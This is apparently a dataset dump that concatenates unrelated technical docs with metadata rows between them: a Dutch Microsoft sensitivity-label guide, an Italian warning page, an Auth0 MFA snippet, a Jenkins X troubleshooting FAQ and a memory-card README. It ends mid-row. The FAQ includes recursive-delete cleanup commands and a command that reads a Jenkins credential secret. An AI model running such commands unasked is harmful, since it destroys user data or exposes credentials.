8. Terug in het deelvenster **Machtigingen toewijzen** selecteert u **Opslaan**.
9. Op de pagina **Versleuteling** selecteert u **Volgende** en voltooit u de configuratie.
### <a name="example-3-add-external-users-to-an-existing-label-that-encrypts-content"></a>Voorbeeld 3: externe gebruikers toevoegen aan een bestaand label waarmee inhoud wordt versleuteld
De nieuwe gebruikers die u toevoegt, kunnen documenten en e-mailberichten openen die al met dit label zijn beveiligd. De machtigingen die u aan deze gebruikers verleent, kunnen verschillen van de machtigingen die de bestaande gebruikers hebben.
1. Op de pagina **Versleuteling**: voor **Machtigingen nu toewijzen of gebruikers laten beslissen?** controleert u of **Machtigingen nu toewijzen** is geselecteerd.
2. Selecteer **Machtigingen toewijzen**.
3. In het deelvenster **Machtigingen toewijzen** selecteert u **Specifieke e-mailadressen of domeinen toevoegen**.
4. Voer in het tekstvak het e-mailadres in van de eerste gebruiker (of groep) die u wilt toevoegen en selecteer vervolgens **Toevoegen**.
5. Selecteer **Machtigingen kiezen**.
6. In het deelvenster **Machtigingen kiezen** selecteert u de machtigingen voor deze gebruiker (of groep) en selecteert u vervolgens **Opslaan**.
7. Herhaal in het deelvenster **Machtigingen toewijzen** stap 3 tot en met 6 voor elke gebruiker (of groep) die u aan dit label wilt toevoegen. Klik vervolgens op **Opslaan**.
8. Op de pagina **Versleuteling** selecteert u **Volgende** en voltooit u de configuratie.
### <a name="example-4-label-that-encrypts-content-but-doesnt-restrict-who-can-access-it"></a>Voorbeeld 4: label waarmee inhoud wordt versleuteld, maar dat niet beperkt wie er toegang toe heeft
Deze configuratie heeft het voordeel dat u geen gebruikers, groepen of domeinen hoeft op te geven om een e-mailbericht of document te versleutelen. De inhoud blijft versleuteld en u kunt nog steeds gebruiksrechten, een vervaldatum en offlinetoegang opgeven.
Gebruik deze configuratie alleen als u niet hoeft te beperken wie het beveiligde document of de beveiligde e-mail kan openen. [Meer informatie over deze instelling](#requirements-and-limitations-for-add-any-authenticated-users)
1. Op de pagina **Versleuteling**: voor **Machtigingen nu toewijzen of gebruikers laten beslissen?** controleert u of **Machtigingen nu toewijzen** is geselecteerd.
2. Configureer instellingen voor **Gebruikerstoegang tot inhoud verloopt** en **Offlinetoegang toestaan**, zoals vereist.
3. Selecteer **Machtigingen toewijzen**.
4. In het deelvenster **Machtigingen toewijzen** selecteert u **Geverifieerde gebruikers toevoegen**.
Voor **Gebruikers en groepen** ziet u dat **Geverifieerde gebruikers** automatisch wordt toegevoegd. U kunt deze waarde niet wijzigen, alleen verwijderen. Hierdoor wordt de waarde **Geverifieerde gebruikers toevoegen** geannuleerd.
5. Selecteer **Machtigingen kiezen**.
6. In het deelvenster **Machtigingen kiezen** selecteert u de vervolgkeuzelijst, vervolgens de gewenste machtigingen en **Opslaan**.
7. Terug in het deelvenster **Machtigingen toewijzen** selecteert u **Opslaan**.
8. Op de pagina **Versleuteling** selecteert u **Volgende** en voltooit u de configuratie.
## <a name="considerations-for-encrypted-content"></a>Aandachtspunten voor versleutelde inhoud
Als u uw gevoeligste documenten en e-mailberichten versleutelt, krijgen alleen geautoriseerde personen toegang tot deze gegevens. Er zijn echter enkele aandachtspunten om rekening mee te houden:
- Als uw organisatie geen [vertrouwelijkheidslabels heeft ingeschakeld voor Office-bestanden in SharePoint en OneDrive](sensitivity-labels-sharepoint-onedrive-files.md):
- Zoeken, eDiscovery en Delve werken niet bij versleutelde bestanden.
- DLP-beleid werkt bij de metagegevens van deze versleutelde bestanden (inclusief informatie over retentielabels), maar niet bij de inhoud van deze bestanden (zoals creditcardnummers in bestanden).
- Gebruikers kunnen versleutelde bestanden niet openen via de webversie van Office. Wanneer vertrouwelijkheidslabels voor Office-bestanden in SharePoint en OneDrive zijn ingeschakeld, kunnen gebruikers de versleutelde bestanden openen in de webversie van Office. Hiervoor bestaan enkele [beperkingen](sensitivity-labels-sharepoint-onedrive-files.md#limitations), waaronder versleuteling die is toegepast met een on-premises sleutel (de zogenaamde 'hold your own key' of HYOK), [, dubbele sleutelcodering](#double-key-encryption) en versleuteling die onafhankelijk van een vertrouwelijkheidslabel is toegepast.
- Als u versleutelde documenten deelt met personen buiten uw organisatie, moet u mogelijk gastaccounts maken en beleid voor voorwaardelijke toegang wijzigen. Zie [Versleutelde documenten delen met externe gebruikers](sensitivity-labels-office-apps.md#support-for-external-users-and-labeled-content)voor meer informatie.
- Wanneer geautoriseerde gebruikers versleutelde documenten openen in hun Office-apps, zien ze de naam en beschrijving van het label in een gele berichtenbalk boven aan hun app. Wanneer de versleutelingsmachtigingen worden uitgebreid naar personen buiten uw organisatie, controleert u zorgvuldig de labelnamen en -beschrijvingen die zichtbaar zijn in deze berichtenbalk wanneer het document wordt geopend.
- Als meerdere gebruikers een versleuteld bestand tegelijkertijd willen bewerken, moeten ze allemaal gebruikmaken van de webversie van Office. Of voor Windows en Mac hebt u [cocreatie ingeschakeld voor bestanden die zijn versleuteld met vertrouwelijkheidslabels](sensitivity-labels-coauthoring.md) en gebruikers hebben de [vereiste minimumversies](sensitivity-labels-office-apps.md#sensitivity-label-capabilities-in-word-excel-and-powerpoint) van Word, Excel en PowerPoint. Als dit niet het geval is en het bestand al is geopend:
- In Office-apps (Windows, Mac, Android en iOS) zien gebruikers het bericht **Bestand in gebruik** met de naam van de persoon die het bestand heeft uitgecheckt. Ze kunnen vervolgens een alleen-lezenkopie bekijken of een kopie van het bestand opslaan en bewerken, en een melding ontvangen wanneer het bestand beschikbaar is.
- In de webversie van Office zien gebruikers een foutbericht dat ze het document niet kunnen bewerken met andere personen. Vervolgens kunnen ze **Openen selecteren in Leesweergave**.
- De functionaliteit [Automatisch opslaan](https://support.office.com/article/what-is-autosave-6d6bd723-ebfd-4e40-b5f6-ae6e8088f7a5) in Office-apps voor iOS en Android is uitgeschakeld voor versleutelde bestanden. Deze functionaliteit is ook uitgeschakeld voor versleutelde bestanden op Windows en Mac als u cocreatie niet hebt [ingeschakeld voor bestanden die zijn versleuteld met gevoeligheidslabels.](sensitivity-labels-coauthoring.md) Gebruikers zien een bericht dat voor het bestand beperkende machtigingen gelden die moeten worden verwijderd voordat Automatisch opslaan kan worden ingeschakeld.
- Het kan langer duren om versleutelde bestanden te openen in Office-apps (Windows, Mac, Android en iOS).
- Als een label waarmee versleuteling wordt toegepast, wordt toegevoegd door middel van een Office-app wanneer het document [in SharePoint wordt uitgecheckt](https://support.microsoft.com/office/check-out-check-in-or-discard-changes-to-files-in-a-library-7e2c12a9-a874-4393-9511-1378a700f6de) en de gebruiker vervolgens het uitgecheckte document negeert, blijft het document gelabeld en versleuteld.
- De volgende acties voor versleutelde bestanden worden niet ondersteund in Office-apps (Windows, Mac, Android en iOS). Gebruikers zien een foutbericht waarin wordt gemeld dat er iets is misgegaan. SharePoint kan echter als alternatief worden gebruikt:
- Kopieën van eerdere versies weergeven, herstellen en opslaan. Als alternatief kunnen gebruikers deze acties uitvoeren met behulp van de webversie van Office wanneer u [versiebeheer inschakelt en configureert voor een lijst of bibliotheek](https://support.office.com/article/enable-and-configure-versioning-for-a-list-or-library-1555d642-23ee-446a-990a-bcab618c7a37).
- Wijzig de naam of locatie van bestanden. Als alternatief kunnen gebruikers [de naam van een bestand, map of koppeling wijzigen in een documentbibliotheek](https://support.microsoft.com/office/rename-a-file-folder-or-link-in-a-document-library-bc493c1a-921f-4bc1-a7f6-985ce11bb185) in SharePoint.
Voor de beste samenwerkingservaring voor bestanden die zijn versleuteld met een vertrouwelijkheidslabel, wordt u aangeraden [vertrouwelijkheidslabels te gebruiken voor Office-bestanden in SharePoint en OneDrive](sensitivity-labels-sharepoint-onedrive-files.md) en de webversie van Office.
## <a name="next-steps"></a>Volgende stappen
Wilt u uw gelabelde en versleutelde documenten delen met personen buiten uw organisatie? Zie [Versleutelde documenten delen met externe gebruikers](sensitivity-labels-office-apps.md#sharing-encrypted-documents-with-external-users). | 99.068736 | 734 | 0.817368 | nld_Latn | 0.999891 |
edf2fe9d11a8969fe8aceb18babdaa73b6a74504 | 606 | md | Markdown | docs/code-quality/c28305.md | Mdlglobal-atlassian-net/cpp-docs.it-it | c8edd4e9238d24b047d2b59a86e2a540f371bd93 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/code-quality/c28305.md | Mdlglobal-atlassian-net/cpp-docs.it-it | c8edd4e9238d24b047d2b59a86e2a540f371bd93 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/code-quality/c28305.md | Mdlglobal-atlassian-net/cpp-docs.it-it | c8edd4e9238d24b047d2b59a86e2a540f371bd93 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2020-05-28T15:54:57.000Z | 2020-05-28T15:54:57.000Z | ---
title: C28305
ms.date: 11/04/2016
ms.topic: reference
f1_keywords:
- C28305
helpviewer_keywords:
- C28305
ms.assetid: c9495d3f-aa11-4695-ab8d-1d2194da9ce3
ms.openlocfilehash: af2dd900dbe69d96bc0ba1c4d984d2227dd44f29
ms.sourcegitcommit: 7bea0420d0e476287641edeb33a9d5689a98cb98
ms.translationtype: MT
ms.contentlocale: it-IT
ms.lasthandoff: 02/17/2020
ms.locfileid: "77421098"
---
# <a name="c28305"></a>C28305
> avviso C28305: è stato individuato un errore durante l'analisi del token \<>.
Questo avviso viene segnalato quando l'espressione contenente il token specificato non è in formato corretto.
| 27.545455 | 109 | 0.80363 | ita_Latn | 0.696365 |
edf3a7d533a39ed5281d335538ecde0c73da60d9 | 1,772 | md | Markdown | articles/multifactor-authentication/developer/mfa-from-id-token.md | lexaurin/docs | cd9f417e844fa1c4fd695945f30f06f2ad5685e6 | [
"MIT"
] | null | null | null | articles/multifactor-authentication/developer/mfa-from-id-token.md | lexaurin/docs | cd9f417e844fa1c4fd695945f30f06f2ad5685e6 | [
"MIT"
] | null | null | null | articles/multifactor-authentication/developer/mfa-from-id-token.md | lexaurin/docs | cd9f417e844fa1c4fd695945f30f06f2ad5685e6 | [
"MIT"
] | null | null | null | ---
description: Describes how to determine if a user has done multifactor authentication using their id_token and JWT
---
## Determine if a user has performed multifactor authentication
At times, it's necessary to determine if a particular user has had the additional security of multifactor authentication applied to their session. For instance, a user may be allowed access to sensitive data or allowed to reset their password only after further confirming their identity using MFA.
For a particular user session, developers can check the claims information available on the `id_token`, a [JSON Web Token](/jwt) provided by Auth0 that contains claims information relevant to the user's session. After [retrieving the id_token](/tokens/id_token), the value of the `amr` field can be evaluated to see if it contains `mfa` as a claim.
Note that `amr` can contain claims other than `mfa`, so its existence is not a sufficient test. Its contents must be examined for the `mfa` claim.
This example is built on top of the [JSON Web Token Sample Code](https://github.com/auth0/node-jsonwebtoken).
```js
const AUTH0_CLIENT_SECRET = '${account.clientSecret}';
const jwt = require('jsonwebtoken')
jwt.verify(id_token, AUTH0_CLIENT_SECRET, { algorithms: ['HS256'] }, function(err, decoded) {
if (err) {
console.log('invalid token');
return;
}
if (Array.isArray(decoded.amr) && decoded.amr.indexOf('mfa') >= 0) {
console.log('You used mfa');
return;
}
console.log('you are not using mfa');
});
```
## Further reading
* [Auth0 id_token](/tokens/id_token)
* [Overview of JSON Web Tokens](/jwt)
* [OpenID and amr](http://openid.net/specs/openid-connect-core-1_0.html)
* [JSON Web Token Example](https://github.com/auth0/node-jsonwebtoken)
| 45.435897 | 348 | 0.741535 | eng_Latn | 0.979658 |
edf4896128ce586b8ece251809b09dcf2ce4761f | 2,686 | md | Markdown | node_modules/_memory-card@0.6.21@memory-card/README.md | qyangge/wechat | 6cad983f9898394f7f0c3408c64da7982f165cb2 | [
"MIT"
] | null | null | null | node_modules/_memory-card@0.6.21@memory-card/README.md | qyangge/wechat | 6cad983f9898394f7f0c3408c64da7982f165cb2 | [
"MIT"
] | null | null | null | node_modules/_memory-card@0.6.21@memory-card/README.md | qyangge/wechat | 6cad983f9898394f7f0c3408c64da7982f165cb2 | [
"MIT"
] | null | null | null | # MEMORY CARD
[](https://badge.fury.io/js/memory-card)
[](https://www.npmjs.com/package/memory-card?activeTab=versions)
[](https://www.typescriptlang.org/)
[](https://travis-ci.com/huan/memory-card)
[](https://greenkeeper.io/)
Memory Card is an Easy to Use Key/Value Store, with Swagger API Backend & Serialization Support.
- It is design for using in distribution scenarios.
- It is NOT design for performance.

## API
```ts
/**
* ES6 Map like Async API
*/
export interface AsyncMap<K = any, V = any> {
size: Promise<number>
[Symbol.asyncIterator](): AsyncIterableIterator<[K, V]>
entries() : AsyncIterableIterator<[K, V]>
keys () : AsyncIterableIterator<K>
values () : AsyncIterableIterator<V>
get (key: K) : Promise<V | undefined>
set (key: K, value: V) : Promise<void>
has (key: K) : Promise<boolean>
delete (key: K) : Promise<void>
clear () : Promise<void>
}
export class MemoryCard implements AsyncMap { ... }
```
### 1. load()
### 2. save()
### 3. destroy()
### 4. multiplex()
## TODO
1. Swagger API Backend Support
1. toJSON Serializable with Metadata
## CHANGELOG
### v0.6 master (Aug 2018)
1. Support AWS S3 Cloud Storage
### v0.4 July 2018
1. Add `multiplex()` method to Multiplex MemoryStore to sub-MemoryStores.
### v0.2 June 2018
1. Unit Testing
1. NPM Pack Testing
1. DevOps to NPM with `@next` tag support for developing branch
### v0.0 May 31st, 2018
1. Promote `Profile` of Wechaty to SOLO NPM Module: `MemoryCard`
1. Update the API to ES6 `Map`-like, the difference is that MemoryCard is all **Async**.
## AUTHOR
Huan LI \<zixia@zixia.net\> (http://linkedin.com/in/zixia)
<a href="http://stackoverflow.com/users/1123955/zixia">
<img src="http://stackoverflow.com/users/flair/1123955.png" width="208" height="58" alt="profile for zixia at Stack Overflow, Q&A for professional and enthusiast programmers" title="profile for zixia at Stack Overflow, Q&A for professional and enthusiast programmers">
</a>
## COPYRIGHT & LICENSE
* Code & Docs © 2017 Huan LI \<zixia@zixia.net\>
* Code released under the Apache-2.0 License
* Docs released under Creative Commons
| 30.873563 | 278 | 0.678332 | kor_Hang | 0.35824 |
edf52e7a2160ed9b20c8439f2cfb1c3316ca263d | 236 | md | Markdown | content/courses/javascript-profesional.md | silnose/silnose.github.io | 50178bedff6f75fa28f7d7e160f66a712471b564 | [
"MIT"
] | null | null | null | content/courses/javascript-profesional.md | silnose/silnose.github.io | 50178bedff6f75fa28f7d7e160f66a712471b564 | [
"MIT"
] | null | null | null | content/courses/javascript-profesional.md | silnose/silnose.github.io | 50178bedff6f75fa28f7d7e160f66a712471b564 | [
"MIT"
] | null | null | null | ---
date: '2020-10-01'
cover: './images/javascript-profesional.png'
title: 'Curso Profesional de JavaScript'
github: 'https://github.com/silnose/javascript-profesional'
external: 'https://platzi.com/courses/javascript-profesional/'
---
| 29.5 | 62 | 0.754237 | ron_Latn | 0.104828 |
edf60be2410537a29a53992b730978847190df93 | 19,723 | md | Markdown | content/en/docs/faq/issues.md | vfarcic/jx-docs-1 | 49b59fd26c83c6a44b6676f096195cbcc2557664 | [
"Apache-2.0"
] | null | null | null | content/en/docs/faq/issues.md | vfarcic/jx-docs-1 | 49b59fd26c83c6a44b6676f096195cbcc2557664 | [
"Apache-2.0"
] | null | null | null | content/en/docs/faq/issues.md | vfarcic/jx-docs-1 | 49b59fd26c83c6a44b6676f096195cbcc2557664 | [
"Apache-2.0"
] | null | null | null | ---
title: Common Problems
linktitle: Common Problems
description: Questions on common issues setting up Jenkins X.
weight: 50
aliases:
- /faq/issues/
---
We have tried to collate common issues here with work arounds. If your issue isn't listed here please [let us know](https://github.com/jenkins-x/jx/issues/new).
## Jenkins X does not startup
If your install fails to start there could be a few different reasons why the Jenkins X pods don't start.
Your cluster could be out of resources. You can check the spare resources on your cluster via [jx status](/commands/jx_status/):
```sh
jx status
```
We also have a diagnostic command that looks for common problems [jx step verify install](/commands/jx_step_verify_install/):
```sh
jx step verify install
```
A common issue for pods not starting is if your cluster does not have a [default storage class](https://kubernetes.io/docs/concepts/storage/storage-classes/) setup so that `Persistent Volume Claims` can be bound to `Persistent Volumes` as described in the [install instructions](/docs/getting-started/install-on-cluster/).
You can check your storage class and persistent volume setup via:
```sh
kubectl get pvc
```
If things are working you should see something like:
```sh
$ kubectl get pvc
NAME STATUS VOLUME CAPACITY ACCESS MODES STORAGECLASS AGE
jenkins Bound pvc-680b39b5-94f1-11e8-b93d-42010a840238 30Gi RWO standard 12h
jenkins-x-chartmuseum Bound pvc-6808fb5e-94f1-11e8-b93d-42010a840238 8Gi RWO standard 12h
jenkins-x-docker-registry Bound pvc-680a415c-94f1-11e8-b93d-42010a840238 100Gi RWO standard 12h
jenkins-x-mongodb Bound pvc-680d6fd9-94f1-11e8-b93d-42010a840238 8Gi RWO standard 12h
jenkins-x-nexus Bound pvc-680fc692-94f1-11e8-b93d-42010a840238 8Gi RWO standard 12h
```
If you see `status` of `Pending` then this indicates that you have no [default storage class](https://kubernetes.io/docs/concepts/storage/storage-classes/) setup on your kubnernetes cluster or you have ran out of persistent volume space.
Please try create a [default storage class](https://kubernetes.io/docs/concepts/storage/storage-classes/) for your cluster or contact your operations team or cloud provider.
If the `Persistent Volume Claims` are all `Bound` and things still have not started then try
```sh
kubectl get pod
```
If a pod cannot start try
```sh
kubectl describe pod some-pod-name
```
Maybe that gives you a clue. Is it RBAC related maybe?
If you are still stuck try [create an issue](https://github.com/jenkins-x/jx/issues/new)
## http: server gave HTTP response to HTTPS client
If your pipeline fails with something like this:
```sh
The push refers to a repository [100.71.203.90:5000/lgil3/jx-test-app]
time="2018-07-09T21:18:31Z" level=fatal msg="build step: pushing [100.71.203.90:5000/lgil3/jx-test-app:0.0.2]: Get https://100.71.203.90:5000/v1/_ping: http: server gave HTTP response to HTTPS client"
```
Then this means that you are using the internal docker registry inside Jenkins X for your images but your kubernetes cluster's docker daemons has not been configured for `insecure-registries` so that you can use `http` to talk to the docker registry service `jenkins-x-docker-registry` in your cluster.
By default docker wants all docker registries to be exposed over `https` and to use TLS and certificates. This should be done for all public docker registries. However when using Jenkins X with an internal local docker registry this is hard since its not available at a public DNS name and doesn't have HTTPS or certificates; so we default to requiring `insecure-registry` be configured on all the docker daemons for your kubernetes worker nodes.
We try to automate this setting when using `jx create cluster` e.g. on AWS we default this value to the IP range `100.64.0.0/10` to match most kubernetes service IP addresses.
On [EKS](/commands/jx_create_cluster_eks/) we default to using ECR to avoid this issue. Similarly we will soon default to GCR and ACR on GKE and AKS respectively.
So a workaround is to use a real [external docker registry](/docs/guides/managing-jx/common-tasks/docker-registry/) or enable `insecure-registry` on your docker daemons on your compute nodes on your Kubernetes cluster.
## Helm fails with Error: UPGRADE FAILED: incompatible versions client[...] server[...]'
Generally speaking this happens when your laptop has a different version of helm to the version used in our build pack docker images and/or the version of tiller thats running in your server.
The simplest fix for this is to just [not use tiller at all](/blog/2018/10/03/helm-without-tiller/) - which actually helps avoid this problem ever happening and solves a raft of security issues too.
However switching from using Tiller to No Tiller does require a re-install of Jenkins X (though you could try do that in separate set of namespaces then move projects across incrementally?).
The manual workaround is to install the [exact same version of helm as used on the server](https://github.com/helm/helm/releases)
Or you can try switch tiller to match your client version:
* run `helm init --upgrade`
Though as soon as a pipeline runs it'll switch the tiller version again so you'll have to keep repeating the above.
## error creating jenkins credential jenkins-x-chartmuseum 500 Server Error
This is a [pending issue](https://github.com/jenkins-x/jx/issues/1234) which we will hopefully fix soon.
It basically happens if you have an old API token in `~/.jx/jenkinsAuth.yaml` for your jenkins server URL. You can either:
* remove it from that file by hand
* run the following command [jx delete jenkins token](/commands/deprecation/):
jx delete jenkins token admin
## errors with chartmuseum.build.cd.jenkins-x.io
If you see errors like:
```sh
error:failed to add the repository 'jenkins-x' with URL 'https://chartmuseum.build.cd.jenkins-x.io'
```
or
```sh
Looks like "https://chartmuseum.build.cd.jenkins-x.io" is not a valid chart repository or cannot be reached
```
then it looks like you have a reference to an old chart museum URL for Jenkins X charts.
The new URL is: http://chartmuseum.jenkins-x.io
It could be your helm install has an old repository URL installed. You should see...
```sh
$ helm repo list
NAME URL
stable https://kubernetes-charts.storage.googleapis.com
jenkins-x http://chartmuseum.jenkins-x.io
```
If you see this...
```sh
$ helm repo list
NAME URL
jenkins-x https://chartmuseum.build.cd.jenkins-x.io
```
then please run...
```sh
helm repo remove jenkins-x
helm repo add jenkins-x http://chartmuseum.jenkins-x.io
```
and you should be good to go again.
Another possible cause is an old URL in your environment's git repository may have old references to the URL.
So open your `env/requirements.yaml` in your staging/production git repositories and modify them to use the URL http://chartmuseum.jenkins-x.io instead of **chartmuseum.build.cd.jenkins-x.io** like this [env/requirements file](https://github.com/jenkins-x/default-environment-charts/blob/master/env/requirements.yaml)
## git errors: POST 401 Bad credentials
This indicates your git API token either was input incorrectly or has been regenerated and is now incorrect.
To recreate it with a new API token value try the following (changing the git server name to match your git provider):
```sh
jx delete git token -n github <yourUserName>
jx create git token -n github <yourUserName>
```
More details on [using git and Jenkins X here](/docs/guides/managing-jx/common-tasks/git/)
## Invalid git token to scan a project
If you get an error in Jenkins when it tries to scan your repositories for branches something like:
```sh
hudson.AbortException: Invalid scan credentials *****/****** (API Token for acccessing https://github.com git service inside pipelines) to connect to https://api.github.com, skipping
```
Then your git API token was probably wrong or has expired.
To recreate it with a new API token value try the following (changing the git server name to match your git provider):
```sh
jx delete git token -n GitHub admin
jx create git token -n GitHub admin
```
More details on [using git and Jenkins X here](/docs/guides/managing-jx/common-tasks/git/)
## What are the credentials to access core services?
Authenticated core services of Jenkins X include Jenkins, Nexus, ChartMuseum. The default username is `admin`and the password by default is generated and printed out in the terminal after `jx create cluster` or `jx install`.
### Set Admin Username and Password values for Core Services
You can also set the admin username via the `--default-admin-username=username` flag.
{{< alert >}}
Perhaps you are using the Active Directory security realm in Jenkins. It is in this scenario that setting the Admin Username via the `--default-admin-username` based on your existing service accounts makes sense.
You may also pass this value via the `myvalues.yaml`.
{{< /alert >}}
If you would like to set the default password yourself then you can set the flag `--default-admin-password=foo` to the two comamnds above.
If you don't have the terminal console output anymore you can look in the local file `~/.jx/jenkinsAuth.yaml` and find the password that matches your Jenkins server URL for the desired cluster.
## Persistent Volume Claims do not bind
If you notice that the persistent volume claims created when installing Jenkins X don't bind with
kubectl get pvc
The you should check that you have a cluster default storage class for dynamic persistent volume provisioning. See [here](https://kubernetes.io/docs/concepts/storage/dynamic-provisioning/) for more details.
## I cannot connect to nodes on AWS
If you don't see any valid nodes returned by `kubectl get node` or you get errors running `jx status` something like:
```sh
Unable to connect to the server: dial tcp: lookup abc.def.regino.eks.amazonaws.com on 10.0.0.2:53: no such host
```
it could be your kube config is stale. Try
```sh
aws eks --region <CLUSTER_REGION> update-kubeconfig --name <CLUSTER_NAME>
```
That should regenerate your local `~/kube/config` file and so `kubectl get node` or `jx status` should find your nodes
## How can I diagnose exposecontroller issues?
When you promote a new version of your application to an environment, such as the Staging Environment a Pull Request is raised on the environment repository.
When the master pipeline runs on an environment a Kubernetes `Job` is created for [exposecontroller](https://github.com/jenkins-x/exposecontroller) which runs a pod until it terminates.
It can be tricky finding the log for temporary jobs since the pod is removed.
One way to diagnose logs in your, say, Staging environment is to [download and install kail](https://github.com/boz/kail) and add it to your `PATH`.
Then run this command:
```sh
kail -l job-name=expose -n jx-staging
```
If you then promote to the Staging environment or retrigger the pipeline on the `master` branch of your Staging git repository (e.g. via [jx start pipeline](/commands/jx_start_pipeline/)) then you should see the output of the [exposecontroller](https://github.com/jenkins-x/exposecontroller) pod.
## Why is promotion really slow?
If you find you get lots of warnings in your pipelines like this...
```sh
"Failed to query the Pull Request last commit status for https://github.com/myorg/environment-mycluster-staging/pull/1 ref xyz Could not find a status for repository myorg/environment-mycluster-staging with ref xyz
```
and promotion takes 30 minutes from a release pipeline on an application starting to the change hitting `Staging` then its mostly probably due to Webhooks.
When we [import projects](/docs/guides/using-jx/creating/import/) or [create quickstarts](/docs/getting-started/first-project/create-quickstart/) we automate the setup of CI/CD pipelines for the git repository. What this does is setup Webhooks on the git repository to trigger Jenkins X to trigger pipelines (either using Prow for [serverless Jenkins X Pipelines](/about/concepts/jenkins-x-pipelines/) or the static jenkins server if not).
However sometimes your git provider (e.g. [GitHub](https://github.com/) may not be able to do connect to your Jenkins X installation (e.g. due to networking / firewall issues).
The easiest way to diagnose this is opening the git repository (e.g. for your environment repository).
```sh
jx get env
```
Then:
* click on the generated URL for, say, your `Staging` git repository
* click the `Settings` icon
* select the `Webhooks` tab on the left
* select your Jenkins X webhook URL
* view the last webhook - did it succeed? Try re-trigger it? That should highlight any network issues etc
If you cannot use public webhooks you could look at something like [ultrahook](http://www.ultrahook.com/)
## Cannot create cluster minikube
If you are using a Mac then `hyperkit` is the best VM driver to use - but does require you to install a recent [Docker for Mac](https://docs.docker.com/docker-for-mac/install/) first. Maybe try that then retry `jx create cluster minikube`?
If your minikube is failing to startup then you could try:
```sh
minikube delete
rm -rf ~/.minikube
```
If the `rm` fails you may need to do:
```sh
sudo rm -rf ~/.minikube
```
Now try `jx create cluster minikube` again - did that help? Sometimes there are stale certs or files hanging around from old installations of minikube that can break things.
Sometimes a reboot can help in cases where virtualisation goes wrong ;)
Otherwise you could try follow the minikube instructions
* [install minikube](https://github.com/kubernetes/minikube#installation)
* [run minikube start](https://github.com/kubernetes/minikube#quickstart)
## Minkube and hyperkit: Could not find an IP address
If you are using minikube on a mac with hyperkit and find minikube fails to start with a log like:
```sh
Temporary Error: Could not find an IP address for 46:0:41:86:41:6e
Temporary Error: Could not find an IP address for 46:0:41:86:41:6e
Temporary Error: Could not find an IP address for 46:0:41:86:41:6e
Temporary Error: Could not find an IP address for 46:0:41:86:41:6e
```
It could be you have hit [this issue in minikube and hyperkit](https://github.com/kubernetes/minikube/issues/1926#issuecomment-356378525).
The work around is to try the following:
```sh
rm ~/.minikube/machines/minikube/hyperkit.pid
```
Then try again. Hopefully this time it will work!
## Cannot access services on minikube
When running minikube locally `jx` defaults to using [nip.io](http://nip.io/) as a way of using nice-isn DNS names for services and working around the fact that most laptops can't do wildcard DNS. However sometimes [nip.io](http://nip.io/) has issues and does not work.
To avoid using [nip.io](http://nip.io/) you can do the following:
Edit the file `~/.jx/cloud-environments/env-minikube/myvalues.yaml` and add the following content:
```yaml
expose:
Args:
- --exposer
- NodePort
- --http
- "true"
```
Then re-run `jx install` and this will switch the services to be exposed on `node ports` instead of using ingress and DNS.
So if you type:
```sh
jx open
```
You'll see all the URs of the form `http://$(minikube ip):somePortNumber` which then avoids going through [nip.io](http://nip.io/) - it just means the URLs are a little more cryptic using magic port numbers rather than simple host names.
## How do I get the Password and Username for Jenkins?
Install [KSD](https://github.com/mfuentesg/ksd) by running `go get github.com/mfuentesg/ksd` and then run `kubectl get secret jenkins -o yaml | ksd`
## How do I see the log of exposecontroller?
Usually we run the [exposecontroller]() as a post install `Job` when we perform promotion to `Staging` or `Production` to expose services over Ingress and possibly inject external URLs into applications configuration.
So the `Job` will trigger a short lived `Pod` to run in the namespace of your environment, then the pod will be deleted.
If you want to view the logs of the `exposecontroller` you will need to watch for the logs using a selector then trigger the promotion pipeline to capture it.
One way to do that is via the [kail](https://github.com/boz/kail) CLI:
```sh
kail -l job-name=expose
```
This will watch for exposecontroller logs and then dump them to the console. Now trigger a promotion pipeline and you should see the output within a minute or so.
## Cannot create TLS certificates during Ingress setup
> [cert-manager](https://docs.cert-manager.io/en/latest/index.html) cert-manager is a seperate project from _Jenkins X_.
Newly created GKE clusters or existing cluster running _kubernetes_ **v1.12** or older will encounter the following error when configuring Ingress with site-wide TLS:
```sh
Waiting for TLS certificates to be issued...
Timeout reached while waiting for TLS certificates to be ready
```
This issue is caused by the _cert-manager_ pod not having the `disable-validation` label set, which is a known cert-manager issue which is [documented on their website](https://docs.cert-manager.io/en/latest/getting-started/install/kubernetes.html). The following steps, taken from the [cert-manager/troubleshooting-installation](https://docs.cert-manager.io/en/latest/getting-started/troubleshooting.html#troubleshooting-installation) webpage, should resolve the issue:
Check if the _disable-validation_ label exists on the _cert-manager_ pod.
```sh
kubectl describe namespace cert-manager
```
If you cannot see the `certmanager.k8s.io/disable-validation=true` label on your namespace, you should add it with:
```sh
kubectl label namespace cert-manager certmanager.k8s.io/disable-validation=true
```
Confirm the label has been added to the _cert-manager_ pod.
```sh
kubectl describe namespace cert-manager
Name: cert-manager
Labels: certmanager.k8s.io/disable-validation=true
Annotations: <none>
Status: Active
...
```
Now rerun _jx_ Ingress setup:
```sh
jx upgrade ingress
```
While the ingress command is running, you can tail the _cert-manager_ logs in another terminal and see what is happening. You will need to find the name of your _cert-manager_ pod using:
```sh
kubectl get pods --namespace cert-manager
```
Then tail the logs of the _cert-manager_ pod.
```sh
kubectl logs YOUR_CERT_MNG_POD --namespace cert-manager -f
```
Your TLS certificates should now be set up and working, otherwise checkout the [official _cert-manager_ troubleshooting](https://docs.cert-manager.io/en/latest/getting-started/troubleshooting.html) instructions.
## Recreating a cluster with the same name
If you want to destroy a cluster that was created with boot and recreate it with the exact same name, there is some clean that needs to be done first.
Make sure you uninstall jx:
```sh
jx uninstall
```
Delete the cluster either from the web console or terminal by using the Kubernetes provider CLI command:
```sh
gcloud container clusters delete <cluster-name> --zone <cluster-zone>
```
After you have successfully done this, remove the `~/.jx` and `~/.kube` directories:
```sh
rm -rf ~/.jx ~/.kube
```
Delete any repositories created by `jx` on your Github organisations account.
Delete the local git `jenkins-x-boot-config` repository.
That should leave your Kubernetes provider and your local environment in a clean state.
## Other issues
Please [let us know](https://github.com/jenkins-x/jx/issues/new) and see if we can help? Good luck!
| 42.324034 | 470 | 0.756325 | eng_Latn | 0.98972 |
edf66d3e40348ac1c84d198db356421f9d2060f2 | 2,539 | md | Markdown | docs/documentation/make-first-prototype/show-users-answers.md | dwp/atw-upload-prototype | 5b74e0ca044a2607f481f8d079c336e6c9ffff1b | [
"MIT"
